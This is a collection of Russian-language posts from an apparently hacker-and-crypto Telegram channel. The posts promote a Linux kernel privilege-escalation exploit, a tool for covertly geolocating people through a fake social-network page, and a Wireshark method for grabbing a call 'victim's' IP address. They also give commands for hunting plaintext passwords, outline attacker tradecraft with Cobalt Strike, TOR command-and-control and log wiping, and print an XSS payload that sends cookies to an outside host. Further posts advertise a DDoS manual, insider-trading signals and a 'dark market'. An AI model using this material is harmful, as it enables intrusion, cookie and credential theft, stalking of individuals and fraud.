💀Уязвимость в ядре линукса позволяет пользователю без привелегий добиться выполнения своего кода с правами.

Уязвимость вызвана ошибкой в обработчике расширения стека - в структуре "maple tree", используемой при управлении областями виртуальной памяти в ядре, замена узла в дереве могла произойти без выставления блокировки на запись, что создавало условия для обращения к области памяти после её освобождения (use-after-free). Уязвимость свежая и устранена только в обновлениях 6.4.1, 6.3.11 и 6.1.37.

(CVE-2023-3269): Linux kernel privilege escalation vulnerability
⚫️
⚫️
⚫️
➡️https://github.com/lrh2000/StackRot/tree/master/exp

💻Курс от Offensive Security, по тестирование на проникновение с помощью Kali Linux .
Если вы хотите познакомится с пентестом вам следует начать именно с этого курса.
Последний раз PEN-200 обновлялся около трех лет назад, перед вами новый этап его эволюции самое свежее обновление 2023 года
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️https://news.1rj.ru/str/FG_FAQ_FG/89

💻Известно ли твоё гео кому нибудь ещё?)

Не ебу, сам ответь себе на вопрос..🤝

Определение местоположения человека с точностью до 100-900 метров. Зависит от интернета. Для активации нужно воспользоваться либо njROK, либо закинуть на свой VDS (это лучше, так как 1 вариант выдаёт предупреждение перед тем, как пропустить на сайт).

🤔Как работает?
Тулза представляет из себя одностраничный сайт соц сети (какой можно выбрать при запуске). Когда человек соглашается с куками, то вам выдаёт его местоположение 🐰
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️https://github.com/thewhiteh4t/seeker
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💪Что бы поддерживать свою форму и быть на пике всех технологических новшеств приходится очень много самообучаться.

Видео курсы, книги, форумы, блоги, чаты, ворк - куча информации, в итоге материала больше чем времени на его изучение. Поэтому важно не только иметь учебные материалы, но и эффективно их усваивать, максимально быстро запоминать, быстро читать, выявлять только самое важное, акцентироваться на практически-полезном .

И, вот, ниже небольшая подборка книг, которые предлагают различные техники по быстрому усвоению информации и грамотные подходы к формированию устойчивых навыков в процессе обучения.

🪫🪫🔋
1. Научиться чему угодно за 20 часов, Джош Кауфман
2. Беглый иностранный за три месяца, Бенни Льюис
3. Запомнить всё: Усвоение знаний без скуки и зубрежки, Питер Браун, Генри Рёдигер, Марк Макдэниэл
4. Как читать, запоминать и никогда не забывать, Марк Тигелаар
5. Как перестать учить иностранный язык и начать на нем жить, Анастасия Иванова
6. Суперобучение, Скотт Янг
7. Биохакинг мозга, Дэйв Эспри
8. Помнить все, Артур Думчев
9. Универсальные правила эффективной тренировки любых умений, Дуг Лемов, Эрика Вулвей и Кейти Ецци
10. Как читать, запоминать и никогда не забывать, Марк Тигелаар
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/90
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💻Пароли в открытом виде в файлах и реестре?

На ранних этапах разработки проекта пароль может оказаться в открытом виде в трейсе или в реестре и это распространенный косяк. Например, если приложение коннектится к базе данных, то зачастую в реестре появляется логин и пароль от SQL-сервера в открытом виде. Точно так же подобная информация может оказаться в продуктовых трейсах или в конфигурационных файлах самого сервиса .


///Искать такие уязвимости можно встроенной командой findstr.

findstr /M /si password *.txt *.xml *.ini *.log 

findstr /M /si pass *.txt *.xml *.ini *.log


///Можно воспользоваться powershell:

Get-ChildItem -Path 'c:\' -Include *.txt,*.xml,*.ini,*.log -File -Recurse -Force -ErrorAction SilentlyContinue | Select-String -Pattern "password" -SimpleMatch -ErrorAction SilentlyContinue

///В реестре встроенной командой reg можно искать вхождение ключевых слов, например password:

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Казалось бы как просто, но надо понимать как это понимать))). Будем давать частями информацию и книги, что бы вы успевали её усваивать. 👍
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/91
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

⚙️Один из олд способов получить IP через телеграмм.

1. Берём и запускаем Wireshark и в фильтре указываем STUN .

2. Нажимаем на лупу (найти пакет) и видим новую строчку с параметрами и поисковой строкой. Выбираем параметр строка

3. В строке пишем XDR-MAPPED-ADDRESS

4. Врубаем wireshark и звоним нашей жертве через телегу. Как только наш "клиент" ответит мы увидим данные в том числе и айпишник

5. Пишем в уже настроенном поисковике XDR-MAPPED-ADDRESS, а то что идет после него и есть нужный нам айпи

Способ избежать этого, юзать впн либо не отвечать на звонки

Кста это работает и с дискордом

Доп нужные настройки:
Настройки->конфиденциальность->звонки->peer-to-peer->не использовать

Накидайте огоньков🔥
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ Зачем нажал сюда
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💻Пути без кавычек .

Эта уязвимость часто встречается, и не все разработчики знают про такую особенность ОС Windows (и потому не обращают на это внимания): если у сервиса или шедульной таски путь к исполняемому файлу содержит пробелы и не взят в кавычки (например, C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe), то при его запуске система будет спотыкаться на пробелах. Дойдет до первого, подставит .exe в конце, проверит, есть ли по получившемуся пути такой исполняемый файл. Если его не найдет, пойдет дальше.

🗂На конкретном примере это выглядит так:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\Program.exe
C:\Program Files (x86)\Program Folder\A.exe
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

Уязвимость заключается в том, что если у непривилегированного пользователя есть права на запись по одному из этих путей, то, положив в него свой исполняемый файл с соответствующим названием (например, C:\Program Files (x86)\Program Folder\A.exe), он может добиться его запуска. Поскольку обычно сервисы запускаются под локальным админом или под Local System (аккаунт, который представляет саму ОС), таким образом злоумышленник легко повышает свои привилегии.

Такие вещи необходимо в первую очередь отслеживать у сервисов и schedule-ных тасок, которые запускают продукт. Надо быть аккуратными с директорией ProgramData. Как правило, в этой директории программы хранят свои данные, но туда могут писать и простые пользователи. Если в ProgramData появляется папка с пробелом, ее можно проэксплуатировать. В итоге всегда брать путь в кавычки — это хорошая практика.
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/93
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💻27 августа, Линус Торвальдс представил свежую версию ядра операционной системы Linux за номером 6.5

Одно из главных нововведений - включение по умолчанию функции P-State EPP для некоторых процессоров AMD, что позволяет максимально эффективно управлять ядрами и найти оптимальный баланс между производительностью и энергоэффективностью. Аналогичное обновление получили и процессоры семейства Intel Alder Lake .

⭐️А также:
- По умолчанию теперь включена и функция AMD FreeSync Video
- Поддержка USB4 v2 и Wi-Fi 7, поддержка контроллеров Intel Barlow Ridge и новых систем AMD Ryzen.
- Поддержка драйвера ядра MIDI 2.0 и оптимизировали код драйвера мыши/клавиатуры PS/2.

Очень интересно, что добавили поддержку чипов Qualcomm Adreno 690 и нескольких новых соков Arm и китайских процов Xuantie 910 TH1520 на RISC-V.

💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

⚙️ Полезнейшее меню .

😎FLUFFY GANG - FUTURE GANG - о том кто мы такие и какие цели преследуем.

🗂 Обучающая информация - Познай крипту с нуля:
😐История блокчейна😐История криптовалюты😐Что такое криптовалюта😐Что такое трейдинг😐Полезные сервисы😐Что такое Airdrop Airdrop guide😐Мультиаккаунты для абуза😐Список важных терминов

🕯 Каких результатов мы достигли за пол года тестирования направления трейдинг тематики

╔=====================╗
Мы гораздо интереснее чем кажется на первый взгляд, смотрите каков наш путь.
╚=====================╝


🌟🌟🌟LVL 1 GANG 👆CLICK
➥Наш мега-форум, все сопричастны к идее воплощения будущего в реальность. Тут вы начнёте знакомство с вселенной FG. Вы определенно осознаете силу знаний и сможете обрести желаемое.


🌟🌟🌟LVL 2 PHOENIX 👆CLICK
➥Уровень который требует должной подготовки и навыки командной работы. Активные направления: CRYPTO / IT FINTECH / CLASSIC COMMERCE / 3D & DESIGN / MUSIC EDITOR / GUIDE LINE / NETWORKING - позволяют обрести новые уникальнейшие возможности.


🌟🌟🌟LVL 3 ILLUMINATI👆CLICK
➥Знать многие исходы заранее, умение манипулировать и вести дела в масштабах государства будут доступны по достижении LVL 3. / Первое появление ILLUMINATI в FG TRADE


🌟🌟🌟LVL 4 MCDXL 👆CLICK
➥Здесь исключительно профессионалы, доходят только самые скилловые участники, они показывают выдающиеся результаты на каждом этапе. Масштабные кибератаки на зарубежных злодеев / Выявление схем / Пробивы / Допуски к криптокошелькам и многое другое.


🌟🌟🌟LVL 5 👆CLICK
➥Самый сложный и самый ценный LVL к которому вы можете прийти. Узнать какой масштаб вас ожидает и с кем вы будете работать, только по достижению LVL 4 .


🔝FG TRADE - Это:
⚡️⚡️⚡️⚡️⚡️⚡️
GEMS CHANNEL
FG ARBITRAGE UNION
FG DARK MARKET|FG PROBIV
FG SAINT SIGNALS|FG NEWS DUMP

SOON в разработке: Сервис копи-трейдинга, IT-компания, Крипто-биржа.

📨Обратная связь: @FG_feedback_bot \ @FLUFFYGANG \ @Aixa_feedback_bot

🤕Кибер-атака? Что-то загадочное?


Или хорошо спланированное


😒Тактика скрытности включает:

Управление и контроль TOR
Избегание узлов, контролируемых EDR .
Выжидание подходящего времени и откладывание подозрительных действий для более поздних этапов атаки
Индивидуальный код и хосты соединения для каждой атаки
Техники обфускации, такие как шифрование и загрузка динамической библиотеки
Контркриминалистические методы, такие как удаление файлов журналов

Рассмотрим как пример знакомые механизмы управления и контроля с помощью клиента RDP, работающего через порт 443, маршрутизируемого через TOR. После установки браузера Tor меняется его конфигурация, чтобы он функционировал как постоянная служба, перенаправляя трафик, отправляемый на локальный (динамический) порт с помощью TOR по HTTPS через порт 443. Такие соединения бывают постоянными, поэтому "злоумышленники" могут устанавливать сессии RDP на взломанных хостах и через них, облегчать перемещение внутри сети.

😒Далее идёт Cobalt Strike как вторичный механизм управления и контроля.

Стейджеры (по типу file.exe) сетапятся удаленно на определенных целевых устройствах с использованием WinRM, каждое из которых настроено по-разному, для соединения с выделенным сервером C2 для загрузки Cobalt Strike Beacon.

Инструментарий для работы в среде обычно подразумевает сканирование сети, запуск команд, создание дампов процессов и сбор данных. Типо Mimikatz или Psexec.

Продолжение следует...
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

/ 📀Приглашаем всех желающих к сотрудничеству.

Нужен человек, с хорошим опытом разработки смарт-контрактов и взаимодействия с сетями ETH. Аналогичный опыт работы будет плюсом. Чем больше стэк-сетей тем больше возможностей и доход.


Че там по зп:
5% от объема или 500$+ в день, по выполнению ТЗ.


💬Обратная связь:
@FG_feedback_bot

⚡️MCDXL LVL 4 | NEW LVL | TRADE | DARK | IT

👺Дроворуб-трейдер - герой современности! Его умение рубить дрова и одновременно торговать на бирже - это нечто невероятное. Он сочетает в себе силу природы и умение делать выгодные сделки. (Да-да, это я, сам себя похвалил)


Не спрашивайте каким образом получен допуск к торговой информации, вы и так сами всё знаете.


↪️ Сигналы разделены на три типа в зависимости от частоты их поступления :

🟣Дейтрейдинг
(сигналы которые поступают из наших источников, отобраны аккуратно) - Размер сделки зависит от объема вашего депозита и составляет около 5-7%.


🟣Хайриск
(Преимущественно сигналы поступают от ботов) - сделка составляет примерно 0.5-1% от вашего депозита.


🟣Swing-сделки
(не требует объяснения, все в названии) - N/A


➕ROE: 100%+ в месяц 💸💸💸
(При условии использования 3 стратегий)


✨ Для лучшего результата, мы лично убедимся, что вы разобрались со всеми нюансами торговли по сигналам, разработаем персональный рм и мм соответствующие вашему депозиту.

____________________________

🤒 WORK ⇲


↪️ Что на счет рубки дров, могу предложить вам сотрудничество. Если у вас есть:

🟣Минимальное понимание основ администрирования серверов.

🟣Понимание основных протоколов работы.

🟣Базовые знания html|css если работаете с лендингами.

🟣Понимание основ криптографии.

🟣Умение спуферить данные которые приходят/уходят в вашей работе.

🟣Знания распределения рисков на сделки, что бы не потерять свои деньги.


✨Зачем это нужно? Иначе вы будете брести в полной тьме, даже не понимая, что делаете от слова совсем и вообще. Успех работы зависит для начала ОТ ПОНИМАНИЯ ДЕЙСТВИЙ, КОТОРЫЕ ВЫ ВЫПОЛНЯЕТЕ. И второе КАК ИМЕННО ЭТО ДЕЙСТВИЕ ФУНКЦИОНИРУЕТ.


🧬Хочешь в MCDXL LVL 4 - пиши @drovorub_UI

🧬Хочешь получать инсайд-сигналы, готовь 20 тысяч зеленых и я буду давать информацию за процент из чистой прибыли

🧬 Хочешь всё сразу, но нет ни денег ни знаний, договаривайся с админами через @FG_feedback_bot, но учти что мы тебе не доверяем и твоя задача будет доказать, что ты не сольешь информацию или не сольешься сам в нужный момент.

Улучшения, объяснения, результаты и прочая информация будет постепенно поступать в публичные каналы, благодарю от всей души вселенную FG за предоставленную возможность опубликовать свой оффер, иду рубить дрова.

💬 GANG CHAT
⚙️GUIDE ECOSYSTEM
🗂ADDLIST \ 🔥LVL 2

Вижу есть люди, которые еще не подписаны на FG TRADE, а зря, вот вам информация, а там уже сами решайте что делать 😎

https://news.1rj.ru/str/FG_TRADE/451

💥XSS ИЛИ КАК СПИЗДЕТЬ КУКИ АДМИНА

Ну че вы? Как дела? Седня будем разбираться с ахуительной ошибкой которая есть у всех новичков и самоучек. Веб разработчики готовимся

Не буду ебать вам мозг высерами из википедии объясню на простом примере:

У нас есть Димон - фронтендер и дядя Миша - заказчик
Дядя Миша говорит Димону:
-Бля, захуяч ка мне панельку с отзывами, хочу знач чтоб клиенты могли писать что у меня лучший автосервис
-Ok, boss

Ну и естстественно димон делает всё наотъебись и идёт спать. И тут появляется Дартаньян, ахуенный хакер, решивший спиздеть бд дяди Миши. Заходит знач он на сайт и видит строку с отзывами. В следующую секунду там появляется вот такой вот текст:

<noscript> new Image().src='https://requestinspector.com/inspect/01h0g8ygn7b83t868ka4bncmq8/'+document.cookie; </noscript>

Когда дядя Миша решает проверить что там наворотил Димон, его кукисы отлетают Дартаньяну. Потом с помощью них он залетает в админку, закрепляется на хосте и ворует бд. А что с Димоном? Вместо денег он получает по ебалу.

Итак, думаю все уже поняли в чём заключается XSS, но еще раз поясню. Это когда у пользователя есть возможность ебануть что-то на JS и это исполнится как код на странице.

В моём примере создалось изображение, местоположение которого отсылало на удалённый сервер вместе с кукисами. Я привел лишь базовый пример уязвимости, а так хакер ограничен лишь своим скилом и фантазией.

Окей, а как избежать подобной хуйни?

👉Добавляем CSP header. Например:
Content-Security-Policy: noscript-src 'self'
Более подробно читай тут: https://auth0.com/blog/defending-against-xss-with-csp/

👉Добавляем WAF, его вариаций дохуя, так что загуглите сами. Да и через CSP защититься намного проще, если вы новичёк в вебе забейте хуй на этот пункт. Не упомянуть о вафе я просто не мог))

👉Тестируем абсолютно все поля пользовательского ввода. Можно например туда вставлять этот код:
<noscript>alert('XSS');</noscript>
Есть отстук? Знач нашли уязвимость. Пиздуем фиксить

👉Используем только безопасные функции JS, никаких innerHTML. (ЛГ 💜 СФ )

💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \

💀💀50cтраниц про ддос.💀💀

Мануал на достаточно трудном языке - нужно или перечитывать или гуглить, но все, что нужно тут есть. Много теории, настройки, скриптов. Много сказано про методы, софты и серваки, под конец неплохая инф про анонимность, заработок и обход защиты. Я даже пару раз хорошо поржал.
⚫️⚫️⚫️⚫️
⚫️
⚫️
⚫️ https://news.1rj.ru/str/FG_FAQ_FG/95
⚫️
⚫️
⚫️⚫️⚫️⚫️⚫️⚫️⚫️
💬 GANG CHAT \
⚙️GUIDE ECOSYSTEM \
🗂ADDLIST \ 🔥LVL 2 \